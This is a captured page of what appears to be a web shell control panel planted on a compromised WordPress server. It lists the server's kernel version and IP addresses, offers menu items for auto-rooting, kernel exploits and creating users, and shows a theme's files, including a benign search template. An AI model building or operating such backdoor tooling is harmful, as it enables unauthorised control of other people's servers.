Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
blossom-spa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
build
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
896
B
-rwxr-xr-x
archive.php
1.26
KB
-rwxr-xr-x
comments.php
1.62
KB
-rwxr-xr-x
footer.php
1009
B
-rwxr-xr-x
front-page.php
600
B
-rwxr-xr-x
functions.php
2.3
KB
-rwxr-xr-x
header.php
1.18
KB
-rwxr-xr-x
index.php
1.37
KB
-rwxr-xr-x
page.php
933
B
-rwxr-xr-x
readme.txt
11.18
KB
-rwxr-xr-x
rtl.css
24.5
KB
-rwxr-xr-x
screenshot.png
198.97
KB
-rwxr-xr-x
search.php
1.25
KB
-rwxr-xr-x
sidebar.php
449
B
-rwxr-xr-x
single-blossom-portfolio.php
2.29
KB
-rwxr-xr-x
single.php
955
B
-rwxr-xr-x
style.css
176.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.php
<?php /** * The template for displaying search results pages * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result * * @package Blossom_Spa */ get_header(); ?> <section id="primary" class="content-area"> <?php /** * blossom_spa_posts_per_page_count - 10 */ do_action( 'blossom_spa_before_posts_content' ); ?> <main id="main" class="site-main"> <?php if ( have_posts() ) : /* Start the Loop */ while ( have_posts() ) : the_post(); /** * Run the loop for the search to output the results. * If you want to overload this in a child theme then include a file * called content-search.php and that will be used instead. */ get_template_part( 'template-parts/content', get_post_format() ); endwhile; else : get_template_part( 'template-parts/content', 'none' ); endif; ?> </main><!-- #main --> <?php /** * After Posts hook * @hooked blossom_spa_navigation - 15 */ do_action( 'blossom_spa_after_posts_content' ); ?> </section><!-- #primary --> <?php get_sidebar(); get_footer();
Close